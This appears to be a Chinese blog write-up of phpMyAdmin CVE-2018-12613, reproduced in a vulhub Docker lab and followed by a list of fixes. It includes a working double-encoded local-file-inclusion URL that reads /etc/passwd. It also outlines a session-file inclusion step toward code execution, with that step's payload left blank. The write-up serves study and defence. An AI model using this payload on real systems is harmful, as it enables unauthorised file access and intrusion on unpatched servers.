PhpMyAdmin文件包含漏洞

目录

漏洞描述

漏洞复现

复现

解决方法

---

漏洞描述

PhpMyAdmin 是一个用 PHP 编写的免费软件工具，旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中，导致文件包含漏洞。

在phpMyadmin4.8.x版本中，程序没有严格控制用户的输入，攻击者可以利用双重编码绕过程序的白名单限制，造成 LFI（本地文件包含）漏洞。

受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。

漏洞复现

    使用docker搭建vulhub平台，

运行以下命令启动phpMyadmin4.8.1

docker-compose up -d

环境启动后，访问http://your-ip:8080. phpmyadmin 是“config”模式，所以我们可以直接登录。

复现

访问地址

http://ip:8080

显示结果：

访问地址

http://ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

结果表明存在文件包含漏洞：

我们可以执行SELECT '';，

 

检查session id（cookie 中phpMyAdmin的值）

包含 session 文件：

解决方法

1. 更新phpmyadmin版本。
2. 删除index.php中使用文件包含的函数。
3. 进行输入转码和过滤拦截敏感字符。
4. 安装杀毒软件，开启防火墙拦截异常行为。